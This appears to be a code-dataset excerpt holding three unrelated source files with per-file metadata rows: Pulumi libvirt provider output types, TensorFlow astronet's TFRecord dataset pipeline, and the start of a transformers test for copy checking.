pulumi.set(__self__, "readonly", readonly)
@property
@pulumi.getter
def source(self) -> str:
return pulumi.get(self, "source")
@property
@pulumi.getter
def target(self) -> str:
return pulumi.get(self, "target")
@property
@pulumi.getter
def accessmode(self) -> Optional[str]:
return pulumi.get(self, "accessmode")
@property
@pulumi.getter
def readonly(self) -> Optional[bool]:
return pulumi.get(self, "readonly")
@pulumi.output_type
class DomainGraphics(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "listenAddress":
suggest = "listen_address"
elif key == "listenType":
suggest = "listen_type"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in DomainGraphics. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
DomainGraphics.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
DomainGraphics.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
autoport: Optional[bool] = None,
listen_address: Optional[str] = None,
listen_type: Optional[str] = None,
type: Optional[str] = None,
websocket: Optional[int] = None):
"""
:param bool autoport: defaults to "yes"
:param str listen_address: IP Address where the VNC listener should be started if
`listen_type` is set to `address`. Defaults to 127.0.0.1
:param str listen_type: "listen type", defaults to "none"
:param str type: Console device type. Valid values are "pty" and "tcp".
:param int websocket: Port to listen on for VNC WebSocket functionality (-1 meaning auto-allocation)
"""
if autoport is not None:
pulumi.set(__self__, "autoport", autoport)
if listen_address is not None:
pulumi.set(__self__, "listen_address", listen_address)
if listen_type is not None:
pulumi.set(__self__, "listen_type", listen_type)
if type is not None:
pulumi.set(__self__, "type", type)
if websocket is not None:
pulumi.set(__self__, "websocket", websocket)
@property
@pulumi.getter
def autoport(self) -> Optional[bool]:
"""
defaults to "yes"
"""
return pulumi.get(self, "autoport")
@property
@pulumi.getter(name="listenAddress")
def listen_address(self) -> Optional[str]:
"""
IP Address where the VNC listener should be started if
`listen_type` is set to `address`. Defaults to 127.0.0.1
"""
return pulumi.get(self, "listen_address")
@property
@pulumi.getter(name="listenType")
def listen_type(self) -> Optional[str]:
"""
"listen type", defaults to "none"
"""
return pulumi.get(self, "listen_type")
@property
@pulumi.getter
def type(self) -> Optional[str]:
"""
        The type of graphics device, for example "spice" or "vnc".
"""
return pulumi.get(self, "type")
@property
@pulumi.getter
def websocket(self) -> Optional[int]:
"""
Port to listen on for VNC WebSocket functionality (-1 meaning auto-allocation)
"""
return pulumi.get(self, "websocket")
@pulumi.output_type
class DomainNetworkInterface(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "networkId":
suggest = "network_id"
elif key == "networkName":
suggest = "network_name"
elif key == "waitForLease":
suggest = "wait_for_lease"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in DomainNetworkInterface. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
DomainNetworkInterface.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
DomainNetworkInterface.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
addresses: Optional[Sequence[str]] = None,
bridge: Optional[str] = None,
hostname: Optional[str] = None,
mac: Optional[str] = None,
macvtap: Optional[str] = None,
network_id: Optional[str] = None,
network_name: Optional[str] = None,
passthrough: Optional[str] = None,
vepa: Optional[str] = None,
wait_for_lease: Optional[bool] = None):
"""
        :param Sequence[str] addresses: One or more IP addresses to assign to this domain in this network.
:param str bridge: Provides a bridge from the VM directly to the LAN. This assumes
there is a bridge device on the host which has one or more of the hosts
physical NICs enslaved. The guest VM will have an associated _tun_ device
created and enslaved to the bridge. The IP range / network configuration is
whatever is used on the LAN. This provides the guest VM full incoming &
outgoing net access just like a physical machine.
:param str hostname: A hostname that will be assigned to this domain
resource in this network.
:param str mac: The specific MAC address to use for this interface.
:param str macvtap: Packets whose destination is on the same host as where they
originate from are directly delivered to the target macvtap device. Both
origin and destination devices need to be in bridge mode for direct delivery.
If either one of them is in vepa mode, a VEPA capable bridge is required.
:param str passthrough: This feature attaches a virtual function of a SRIOV capable
NIC directly to a VM without losing the migration capability. All packets are
sent to the VF/IF of the configured network device. Depending on the
capabilities of the device additional prerequisites or limitations may apply;
for example, on Linux this requires kernel 2.6.38 or newer.
:param str vepa: All VMs' packets are sent to the external bridge. Packets whose
destination is a VM on the same host as where the packet originates from are
sent back to the host by the VEPA capable bridge (today's bridges are
typically not VEPA capable).
:param bool wait_for_lease: When creating the domain resource, wait until the
network interface gets a DHCP lease from libvirt, so that the computed IP
addresses will be available when the domain is up and the plan applied.
"""
if addresses is not None:
pulumi.set(__self__, "addresses", addresses)
if bridge is not None:
pulumi.set(__self__, "bridge", bridge)
if hostname is not None:
pulumi.set(__self__, "hostname", hostname)
if mac is not None:
pulumi.set(__self__, "mac", mac)
if macvtap is not None:
pulumi.set(__self__, "macvtap", macvtap)
if network_id is not None:
pulumi.set(__self__, "network_id", network_id)
if network_name is not None:
pulumi.set(__self__, "network_name", network_name)
if passthrough is not None:
pulumi.set(__self__, "passthrough", passthrough)
if vepa is not None:
pulumi.set(__self__, "vepa", vepa)
if wait_for_lease is not None:
pulumi.set(__self__, "wait_for_lease", wait_for_lease)
@property
@pulumi.getter
def addresses(self) -> Optional[Sequence[str]]:
"""
        One or more IP addresses to assign to this domain in this network.
"""
return pulumi.get(self, "addresses")
@property
@pulumi.getter
def bridge(self) -> Optional[str]:
"""
Provides a bridge from the VM directly to the LAN. This assumes
there is a bridge device on the host which has one or more of the hosts
physical NICs enslaved. The guest VM will have an associated _tun_ device
created and enslaved to the bridge. The IP range / network configuration is
whatever is used on the LAN. This provides the guest VM full incoming &
outgoing net access just like a physical machine.
"""
return pulumi.get(self, "bridge")
@property
@pulumi.getter
def hostname(self) -> Optional[str]:
"""
A hostname that will be assigned to this domain
resource in this network.
"""
return pulumi.get(self, "hostname")
@property
@pulumi.getter
def mac(self) -> Optional[str]:
"""
The specific MAC address to use for this interface.
"""
return pulumi.get(self, "mac")
@property
@pulumi.getter
def macvtap(self) -> Optional[str]:
"""
Packets whose destination is on the same host as where they
originate from are directly delivered to the target macvtap device. Both
origin and destination devices need to be in bridge mode for direct delivery.
If either one of them is in vepa mode, a VEPA capable bridge is required.
"""
return pulumi.get(self, "macvtap")
@property
@pulumi.getter(name="networkId")
def network_id(self) -> Optional[str]:
return pulumi.get(self, "network_id")
@property
@pulumi.getter(name="networkName")
def network_name(self) -> Optional[str]:
return pulumi.get(self, "network_name")
@property
@pulumi.getter
def passthrough(self) -> Optional[str]:
"""
This feature attaches a virtual function of a SRIOV capable
NIC directly to a VM without losing the migration capability. All packets are
sent to the VF/IF of the configured network device. Depending on the
capabilities of the device additional prerequisites or limitations may apply;
for example, on Linux this requires kernel 2.6.38 or newer.
"""
return pulumi.get(self, "passthrough")
@property
@pulumi.getter
def vepa(self) -> Optional[str]:
"""
All VMs' packets are sent to the external bridge. Packets whose
destination is a VM on the same host as where the packet originates from are
sent back to the host by the VEPA capable bridge (today's bridges are
typically not VEPA capable).
"""
return pulumi.get(self, "vepa")
@property
@pulumi.getter(name="waitForLease")
def wait_for_lease(self) -> Optional[bool]:
"""
When creating the domain resource, wait until the
network interface gets a DHCP lease from libvirt, so that the computed IP
addresses will be available when the domain is up and the plan applied.
"""
return pulumi.get(self, "wait_for_lease")
@pulumi.output_type
class DomainNvram(dict):
def __init__(__self__, *,
file: str,
template: Optional[str] = None):
"""
        :param str file: Path to the file backing the NVRAM store.
:param str template: path to the file used to override variables from the master NVRAM
store.
"""
pulumi.set(__self__, "file", file)
if template is not None:
pulumi.set(__self__, "template", template)
@property
@pulumi.getter
def file(self) -> str:
"""
        Path to the file backing the NVRAM store.
"""
return pulumi.get(self, "file")
@property
@pulumi.getter
def template(self) -> Optional[str]:
"""
path to the file used to override variables from the master NVRAM
store.
"""
return pulumi.get(self, "template")
@pulumi.output_type
class DomainTpm(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "backendDevicePath":
suggest = "backend_device_path"
elif key == "backendEncryptionSecret":
suggest = "backend_encryption_secret"
elif key == "backendPersistentState":
suggest = "backend_persistent_state"
elif key == "backendType":
suggest = "backend_type"
elif key == "backendVersion":
suggest = "backend_version"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in DomainTpm. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
DomainTpm.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
DomainTpm.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
backend_device_path: Optional[str] = None,
backend_encryption_secret: Optional[str] = None,
backend_persistent_state: Optional[bool] = None,
backend_type: Optional[str] = None,
backend_version: Optional[str] = None,
model: Optional[str] = None):
"""
:param str backend_device_path: Path to TPM device on the host, ex: `/dev/tpm0`
:param str backend_encryption_secret: [Secret object](https://libvirt.org/formatsecret.html) for encrypting the TPM state
:param bool backend_persistent_state: Keep the TPM state when a transient domain is powered off or undefined
:param str backend_type: TPM backend, either `passthrough` or `emulator` (default: `emulator`)
:param str backend_version: TPM version
:param str model: TPM model provided to the guest
"""
if backend_device_path is not None:
pulumi.set(__self__, "backend_device_path", backend_device_path)
if backend_encryption_secret is not None:
pulumi.set(__self__, "backend_encryption_secret", backend_encryption_secret)
if backend_persistent_state is not None:
pulumi.set(__self__, "backend_persistent_state", backend_persistent_state)
if backend_type is not None:
pulumi.set(__self__, "backend_type", backend_type)
if backend_version is not None:
pulumi.set(__self__, "backend_version", backend_version)
if model is not None:
pulumi.set(__self__, "model", model)
@property
@pulumi.getter(name="backendDevicePath")
def backend_device_path(self) -> Optional[str]:
"""
Path to TPM device on the host, ex: `/dev/tpm0`
"""
return pulumi.get(self, "backend_device_path")
@property
@pulumi.getter(name="backendEncryptionSecret")
def backend_encryption_secret(self) -> Optional[str]:
"""
[Secret object](https://libvirt.org/formatsecret.html) for encrypting the TPM state
"""
return pulumi.get(self, "backend_encryption_secret")
@property
@pulumi.getter(name="backendPersistentState")
def backend_persistent_state(self) -> Optional[bool]:
"""
Keep the TPM state when a transient domain is powered off or undefined
"""
return pulumi.get(self, "backend_persistent_state")
@property
@pulumi.getter(name="backendType")
def backend_type(self) -> Optional[str]:
"""
TPM backend, either `passthrough` or `emulator` (default: `emulator`)
"""
return pulumi.get(self, "backend_type")
@property
@pulumi.getter(name="backendVersion")
def backend_version(self) -> Optional[str]:
"""
TPM version
"""
return pulumi.get(self, "backend_version")
@property
@pulumi.getter
def model(self) -> Optional[str]:
"""
TPM model provided to the guest
"""
return pulumi.get(self, "model")
@pulumi.output_type
class DomainVideo(dict):
def __init__(__self__, *,
type: Optional[str] = None):
"""
        :param str type: The type of video device exposed to the guest, for example "cirrus" or "qxl".
"""
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def type(self) -> Optional[str]:
"""
        The type of video device exposed to the guest, for example "cirrus" or "qxl".
"""
return pulumi.get(self, "type")
@pulumi.output_type
class DomainXml(dict):
def __init__(__self__, *,
xslt: Optional[str] = None):
if xslt is not None:
pulumi.set(__self__, "xslt", xslt)
@property
@pulumi.getter
def xslt(self) -> Optional[str]:
return pulumi.get(self, "xslt")
@pulumi.output_type
class NetworkDhcp(dict):
def __init__(__self__, *,
enabled: Optional[bool] = None):
"""
:param bool enabled: when false, disable the DHCP server
"""
if enabled is not None:
pulumi.set(__self__, "enabled", enabled)
@property
@pulumi.getter
def enabled(self) -> Optional[bool]:
"""
when false, disable the DHCP server
"""
return pulumi.get(self, "enabled")
@pulumi.output_type
class NetworkDns(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "localOnly":
suggest = "local_only"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in NetworkDns. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
NetworkDns.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
NetworkDns.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
enabled: Optional[bool] = None,
forwarders: Optional[Sequence['outputs.NetworkDnsForwarder']] = None,
hosts: Optional[Sequence['outputs.NetworkDnsHost']] = None,
local_only: Optional[bool] = None,
srvs: Optional[Sequence['outputs.NetworkDnsSrv']] = None):
"""
        :param bool enabled: when false, disable the DNS server
:param Sequence['NetworkDnsForwarderArgs'] forwarders: Either `address`, `domain`, or both must be set
:param Sequence['NetworkDnsHostArgs'] hosts: a DNS host entry block. You can have one or more of these
blocks in your DNS definition. You must specify both `ip` and `hostname`.
        :param bool local_only: when true, do not forward unresolved requests for this domain to the parent DNS server
:param Sequence['NetworkDnsSrvArgs'] srvs: a DNS SRV entry block. You can have one or more of these blocks
in your DNS definition. You must specify `service` and `protocol`.
"""
if enabled is not None:
pulumi.set(__self__, "enabled", enabled)
if forwarders is not None:
pulumi.set(__self__, "forwarders", forwarders)
if hosts is not None:
pulumi.set(__self__, "hosts", hosts)
if local_only is not None:
pulumi.set(__self__, "local_only", local_only)
if srvs is not None:
pulumi.set(__self__, "srvs", srvs)
@property
@pulumi.getter
def enabled(self) -> Optional[bool]:
"""
        when false, disable the DNS server
"""
return pulumi.get(self, "enabled")
@property
@pulumi.getter
def forwarders(self) -> Optional[Sequence['outputs.NetworkDnsForwarder']]:
"""
Either `address`, `domain`, or both must be set
"""
return pulumi.get(self, "forwarders")
@property
@pulumi.getter
def hosts(self) -> Optional[Sequence['outputs.NetworkDnsHost']]:
"""
a DNS host entry block. You can have one or more of these
blocks in your DNS definition. You must specify both `ip` and `hostname`.
"""
return pulumi.get(self, "hosts")
@property
@pulumi.getter(name="localOnly")
def local_only(self) -> Optional[bool]:
"""
        when true, do not forward unresolved requests for this domain to the parent DNS server
"""
return pulumi.get(self, "local_only")
@property
@pulumi.getter
def srvs(self) -> Optional[Sequence['outputs.NetworkDnsSrv']]:
"""
a DNS SRV entry block. You can have one or more of these blocks
in your DNS definition. You must specify `service` and `protocol`.
"""
return pulumi.get(self, "srvs")
@pulumi.output_type
class NetworkDnsForwarder(dict):
def __init__(__self__, *,
address: Optional[str] = None,
domain: Optional[str] = None):
"""
:param str domain: The domain used by the DNS server.
"""
if address is not None:
pulumi.set(__self__, "address", address)
if domain is not None:
pulumi.set(__self__, "domain", domain)
@property
@pulumi.getter
def address(self) -> Optional[str]:
return pulumi.get(self, "address")
@property
@pulumi.getter
def domain(self) -> Optional[str]:
"""
The domain used by the DNS server.
"""
return pulumi.get(self, "domain")
@pulumi.output_type
class NetworkDnsHost(dict):
def __init__(__self__, *,
hostname: Optional[str] = None,
ip: Optional[str] = None):
if hostname is not None:
pulumi.set(__self__, "hostname", hostname)
if ip is not None:
pulumi.set(__self__, "ip", ip)
@property
@pulumi.getter
def hostname(self) -> Optional[str]:
return pulumi.get(self, "hostname")
@property
@pulumi.getter
def ip(self) -> Optional[str]:
return pulumi.get(self, "ip")
@pulumi.output_type
class NetworkDnsSrv(dict):
def __init__(__self__, *,
domain: Optional[str] = None,
port: Optional[str] = None,
priority: Optional[str] = None,
protocol: Optional[str] = None,
service: Optional[str] = None,
target: Optional[str] = None,
weight: Optional[str] = None):
"""
:param str domain: The domain used by the DNS server.
"""
if domain is not None:
pulumi.set(__self__, "domain", domain)
if port is not None:
pulumi.set(__self__, "port", port)
if priority is not None:
pulumi.set(__self__, "priority", priority)
if protocol is not None:
pulumi.set(__self__, "protocol", protocol)
if service is not None:
pulumi.set(__self__, "service", service)
if target is not None:
pulumi.set(__self__, "target", target)
if weight is not None:
pulumi.set(__self__, "weight", weight)
@property
@pulumi.getter
def domain(self) -> Optional[str]:
"""
The domain used by the DNS server.
"""
return pulumi.get(self, "domain")
@property
@pulumi.getter
def port(self) -> Optional[str]:
return pulumi.get(self, "port")
@property
@pulumi.getter
def priority(self) -> Optional[str]:
return pulumi.get(self, "priority")
@property
@pulumi.getter
def protocol(self) -> Optional[str]:
return pulumi.get(self, "protocol")
@property
@pulumi.getter
def service(self) -> Optional[str]:
return pulumi.get(self, "service")
@property
@pulumi.getter
def target(self) -> Optional[str]:
return pulumi.get(self, "target")
@property
@pulumi.getter
def weight(self) -> Optional[str]:
return pulumi.get(self, "weight")
@pulumi.output_type
class NetworkDnsmasqOptions(dict):
def __init__(__self__, *,
options: Optional[Sequence['outputs.NetworkDnsmasqOptionsOption']] = None):
"""
:param Sequence['NetworkDnsmasqOptionsOptionArgs'] options: a Dnsmasq option entry block. You can have one or more of these
blocks in your definition. You must specify both `option_name` and `option_value`.
"""
if options is not None:
pulumi.set(__self__, "options", options)
@property
@pulumi.getter
def options(self) -> Optional[Sequence['outputs.NetworkDnsmasqOptionsOption']]:
"""
a Dnsmasq option entry block. You can have one or more of these
blocks in your definition. You must specify both `option_name` and `option_value`.
"""
return pulumi.get(self, "options")
@pulumi.output_type
class NetworkDnsmasqOptionsOption(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "optionName":
suggest = "option_name"
elif key == "optionValue":
suggest = "option_value"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in NetworkDnsmasqOptionsOption. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
NetworkDnsmasqOptionsOption.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
NetworkDnsmasqOptionsOption.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
option_name: Optional[str] = None,
option_value: Optional[str] = None):
if option_name is not None:
pulumi.set(__self__, "option_name", option_name)
if option_value is not None:
pulumi.set(__self__, "option_value", option_value)
@property
@pulumi.getter(name="optionName")
def option_name(self) -> Optional[str]:
return pulumi.get(self, "option_name")
@property
@pulumi.getter(name="optionValue")
def option_value(self) -> Optional[str]:
return pulumi.get(self, "option_value")
@pulumi.output_type
class NetworkRoute(dict):
def __init__(__self__, *,
cidr: str,
gateway: str):
pulumi.set(__self__, "cidr", cidr)
pulumi.set(__self__, "gateway", gateway)
@property
@pulumi.getter
def cidr(self) -> str:
return pulumi.get(self, "cidr")
@property
@pulumi.getter
def gateway(self) -> str:
return pulumi.get(self, "gateway")
@pulumi.output_type
class NetworkXml(dict):
def __init__(__self__, *,
xslt: Optional[str] = None):
if xslt is not None:
pulumi.set(__self__, "xslt", xslt)
@property
@pulumi.getter
def xslt(self) -> Optional[str]:
return pulumi.get(self, "xslt")
@pulumi.output_type
class PoolXml(dict):
def __init__(__self__, *,
xslt: Optional[str] = None):
if xslt is not None:
pulumi.set(__self__, "xslt", xslt)
@property
@pulumi.getter
def xslt(self) -> Optional[str]:
return pulumi.get(self, "xslt")
@pulumi.output_type
class VolumeXml(dict):
def __init__(__self__, *,
xslt: Optional[str] = None):
if xslt is not None:
pulumi.set(__self__, "xslt", xslt)
@property
@pulumi.getter
def xslt(self) -> Optional[str]:
return pulumi.get(self, "xslt")
| 34.153061
| 147
| 0.604422
|
b80c67f324021a48a1067013612fc07c23a75fa8
| 10,851
|
py
|
Python
|
research/astronet/astronet/ops/dataset_ops.py
|
kopankom/models
|
3f78f4cfd21c786c62bf321c07830071027ebb5e
|
[
"Apache-2.0"
] | 5
|
2018-04-03T15:54:54.000Z
|
2020-02-01T08:19:38.000Z
|
research/astronet/astronet/ops/dataset_ops.py
|
kopankom/models
|
3f78f4cfd21c786c62bf321c07830071027ebb5e
|
[
"Apache-2.0"
] | 1
|
2021-03-31T19:32:00.000Z
|
2021-03-31T19:32:00.000Z
|
research/astronet/astronet/ops/dataset_ops.py
|
kopankom/models
|
3f78f4cfd21c786c62bf321c07830071027ebb5e
|
[
"Apache-2.0"
] | 3
|
2018-04-27T15:37:08.000Z
|
2021-12-06T12:00:53.000Z
|
# Copyright 2018 The TensorFlow Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Functions to build an input pipeline that reads from TFRecord files."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import six
import tensorflow as tf
def pad_tensor_to_batch_size(tensor, batch_size):
"""Pads a Tensor along the batch dimension to the desired batch size."""
if batch_size < 2:
raise ValueError("Cannot pad along batch dimension with batch_size < 2.")
ndims = len(tensor.shape)
if ndims < 1:
raise ValueError("Cannot pad a 0-dimensional Tensor")
num_pad_examples = batch_size - tf.shape(tensor)[0]
# paddings is a 2D Tensor with shape [ndims, 2]. Every element is zero except
# for paddings[0][1], which is the number of values to add along the 0-th
# dimension (the batch dimension) after the contents of the input tensor.
paddings = tf.sparse_to_dense(
sparse_indices=[[0, 1]],
output_shape=[ndims, 2],
sparse_values=num_pad_examples)
padded_tensor = tf.pad(tensor, paddings, name=tensor.op.name + "/pad")
# Set the new shape.
output_shape = tensor.shape.as_list()
output_shape[0] = batch_size
padded_tensor.set_shape(output_shape)
return padded_tensor
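# Editor's sketch (not part of the original module): shape-level illustration
# of pad_tensor_to_batch_size. It assumes TF 1.x graph mode, matching the rest
# of this file, and is never called from the pipeline code.
def _example_pad_tensor():
  features = tf.zeros([3, 201])                    # a partial batch of 3 rows
  padded = pad_tensor_to_batch_size(features, 8)   # zero-pads rows 3..7
  # padded has static shape [8, 201]; the original 3 rows are unchanged.
  return padded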
def _recursive_pad_to_batch_size(tensor_or_collection, batch_size):
"""Recursively pads to the batch size in a Tensor or collection of Tensors."""
if isinstance(tensor_or_collection, tf.Tensor):
return pad_tensor_to_batch_size(tensor_or_collection, batch_size)
if isinstance(tensor_or_collection, dict):
return {
name: _recursive_pad_to_batch_size(t, batch_size)
        for name, t in six.iteritems(tensor_or_collection)
}
if isinstance(tensor_or_collection, collections.Iterable):
return [
_recursive_pad_to_batch_size(t, batch_size)
for t in tensor_or_collection
]
raise ValueError("Unknown input type: %s" % tensor_or_collection)
def pad_dataset_to_batch_size(dataset, batch_size):
"""Pads Tensors in a dataset along the batch dimension to batch_size.
The output contains a 'weights' Tensor, which is a 0/1 indicator of padded
elements. If a 'weights' Tensor already exists in the input dataset, then that
Tensor is padded with zeros. If a 'weights' Tensor does not already exist,
then the input dataset is assumed to have a 'labels' Tensor which is used to
construct the weights.
Args:
dataset: A tf.data.Dataset.
batch_size: Integer batch size.
Returns:
A tf.data.Dataset.
"""
def map_fn(tensors):
"""Pads Tensors along the batch dimension to the desired batch size."""
if not isinstance(tensors, dict):
raise ValueError(
"pad_dataset_to_batch_size requires a dictionary of named Tensors.")
outputs = _recursive_pad_to_batch_size(tensors, batch_size)
if "weights" not in outputs:
weights = tf.ones_like(tensors["labels"], dtype=tf.float32)
outputs["weights"] = pad_tensor_to_batch_size(weights, batch_size)
return outputs
return dataset.map(map_fn)
def _recursive_set_batch_size(tensor_or_collection, batch_size):
"""Recursively sets the batch size in a Tensor or collection of Tensors."""
if isinstance(tensor_or_collection, tf.Tensor):
t = tensor_or_collection
shape = t.shape.as_list()
shape[0] = batch_size
t.set_shape(t.shape.merge_with(shape))
elif isinstance(tensor_or_collection, dict):
for t in six.itervalues(tensor_or_collection):
_recursive_set_batch_size(t, batch_size)
elif isinstance(tensor_or_collection, collections.Iterable):
for t in tensor_or_collection:
_recursive_set_batch_size(t, batch_size)
else:
raise ValueError("Unknown input type: %s" % tensor_or_collection)
return tensor_or_collection
def set_batch_size(dataset, batch_size):
"""Sets the batch dimension in all Tensors to batch_size."""
return dataset.map(lambda t: _recursive_set_batch_size(t, batch_size))
def build_dataset(file_pattern,
input_config,
batch_size,
include_labels=True,
reverse_time_series_prob=0,
shuffle_filenames=False,
shuffle_values_buffer=0,
repeat=1,
use_tpu=False):
"""Builds an input pipeline that reads a dataset from sharded TFRecord files.
Args:
file_pattern: File pattern matching input TFRecord files, e.g.
"/tmp/train-?????-of-00100". May also be a comma-separated list of file
patterns.
input_config: ConfigDict containing feature and label specifications.
batch_size: The number of examples per batch.
include_labels: Whether to read labels from the input files.
reverse_time_series_prob: If > 0, the time series features will be randomly
reversed with this probability. Within a given example, either all time
series features will be reversed, or none will be reversed.
shuffle_filenames: Whether to shuffle the order of TFRecord files between
epochs.
shuffle_values_buffer: If > 0, shuffle examples using a buffer of this size.
repeat: The number of times to repeat the dataset. If None or -1 the dataset
will repeat indefinitely.
use_tpu: Whether to build the dataset for TPU.
Raises:
ValueError: If an input file pattern does not match any files, or if the
label IDs in input_config.label_map are not contiguous integers starting
at 0.
Returns:
A tf.data.Dataset object.
"""
file_patterns = file_pattern.split(",")
filenames = []
for p in file_patterns:
matches = tf.gfile.Glob(p)
if not matches:
raise ValueError("Found no input files matching %s" % p)
filenames.extend(matches)
tf.logging.info("Building input pipeline from %d files matching patterns: %s",
len(filenames), file_patterns)
if include_labels:
# Ensure that the label ids are contiguous integers starting at 0.
label_ids = set(input_config.label_map.values())
if label_ids != set(range(len(label_ids))):
raise ValueError(
"Label IDs must be contiguous integers starting at 0. Got: %s" %
label_ids)
# Create a HashTable mapping label strings to integer ids.
table_initializer = tf.contrib.lookup.KeyValueTensorInitializer(
keys=input_config.label_map.keys(),
values=input_config.label_map.values(),
key_dtype=tf.string,
value_dtype=tf.int32)
label_to_id = tf.contrib.lookup.HashTable(
table_initializer, default_value=-1)
def _example_parser(serialized_example):
"""Parses a single tf.Example into image and label tensors."""
# Set specifications for parsing the features.
data_fields = {
feature_name: tf.FixedLenFeature([feature.length], tf.float32)
        for feature_name, feature in six.iteritems(input_config.features)
}
if include_labels:
data_fields[input_config.label_feature] = tf.FixedLenFeature([],
tf.string)
# Parse the features.
parsed_features = tf.parse_single_example(
serialized_example, features=data_fields)
if reverse_time_series_prob > 0:
# Randomly reverse time series features with probability
# reverse_time_series_prob.
should_reverse = tf.less(
tf.random_uniform([], 0, 1),
reverse_time_series_prob,
name="should_reverse")
# Reorganize outputs.
output = {}
    for feature_name, value in six.iteritems(parsed_features):
if include_labels and feature_name == input_config.label_feature:
label_id = label_to_id.lookup(value)
# Ensure that the label_id is nonnegative to verify a successful hash
# map lookup.
assert_known_label = tf.Assert(
tf.greater_equal(label_id, tf.to_int32(0)),
["Unknown label string:", value])
with tf.control_dependencies([assert_known_label]):
label_id = tf.identity(label_id)
# We use the plural name "labels" in the output due to batching.
output["labels"] = label_id
elif input_config.features[feature_name].is_time_series:
# Possibly reverse.
if reverse_time_series_prob > 0:
# pylint:disable=cell-var-from-loop
value = tf.cond(should_reverse, lambda: tf.reverse(value, axis=[0]),
lambda: tf.identity(value))
# pylint:enable=cell-var-from-loop
if "time_series_features" not in output:
output["time_series_features"] = {}
output["time_series_features"][feature_name] = value
else:
if "aux_features" not in output:
output["aux_features"] = {}
output["aux_features"][feature_name] = value
return output
# Create a string dataset of filenames, and possibly shuffle.
filename_dataset = tf.data.Dataset.from_tensor_slices(filenames)
if len(filenames) > 1 and shuffle_filenames:
filename_dataset = filename_dataset.shuffle(len(filenames))
# Read serialized Example protos.
dataset = filename_dataset.flat_map(tf.data.TFRecordDataset)
# Possibly shuffle. Note that we shuffle before repeat(), so we only shuffle
# elements among each "epoch" of data, and not across epochs of data.
if shuffle_values_buffer > 0:
dataset = dataset.shuffle(shuffle_values_buffer)
# Repeat.
if repeat != 1:
dataset = dataset.repeat(repeat)
# Map the parser over the dataset.
dataset = dataset.map(_example_parser, num_parallel_calls=4)
# Batch results by up to batch_size.
dataset = dataset.batch(batch_size)
if repeat == -1 or repeat is None:
# The dataset repeats infinitely before batching, so each batch has the
# maximum number of elements.
dataset = set_batch_size(dataset, batch_size)
elif use_tpu:
# TPU requires all dimensions to be fixed. Since the dataset does not repeat
# infinitely before batching, the final batch may have fewer than batch_size
# elements. Therefore we pad to ensure that the final batch has batch_size
# elements.
dataset = pad_dataset_to_batch_size(dataset, batch_size)
# Prefetch a few batches.
dataset = dataset.prefetch(max(1, int(256 / batch_size)))
return dataset
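# Editor's sketch (not part of the original module): typical wiring of
# build_dataset into a training input_fn. The file pattern is hypothetical,
# and input_config is assumed to be a ConfigDict with the `features`,
# `label_feature` and `label_map` fields that build_dataset reads above.
def _example_input_fn(input_config):
  return build_dataset(
      file_pattern="/tmp/train-*",   # hypothetical TFRecord shards
      input_config=input_config,
      batch_size=64,
      shuffle_values_buffer=1000,    # shuffle within each epoch
      repeat=None)                   # repeat indefinitely for training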
| 37.808362
| 80
| 0.70611
|
5789496a8ac6fb61595bc6316ec1ded1d17e600e
| 9,020
|
py
|
Python
|
tests/test_utils_check_copies.py
|
uunal/adapter-transformers
|
73a95a75f803e8fd243fc3d55ff3a9d557891377
|
[
"Apache-2.0"
] | 723
|
2020-07-16T13:02:25.000Z
|
2022-03-31T21:03:55.000Z
|
tests/test_utils_check_copies.py
|
uunal/adapter-transformers
|
73a95a75f803e8fd243fc3d55ff3a9d557891377
|
[
"Apache-2.0"
] | 170
|
2020-07-16T14:39:11.000Z
|
2022-03-31T13:02:11.000Z
|
tests/test_utils_check_copies.py
|
uunal/adapter-transformers
|
73a95a75f803e8fd243fc3d55ff3a9d557891377
|
[
"Apache-2.0"
] | 131
|
2020-07-16T14:38:16.000Z
|
2022-03-29T19:43:18.000Z
|
# Copyright 2020 The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import re
import shutil
import sys
import tempfile
import unittest
import black
git_repo_path = os.path.abspath(os.path.dirname(os.path.dirname(__file__)))
sys.path.append(os.path.join(git_repo_path, "utils"))
import check_copies # noqa: E402
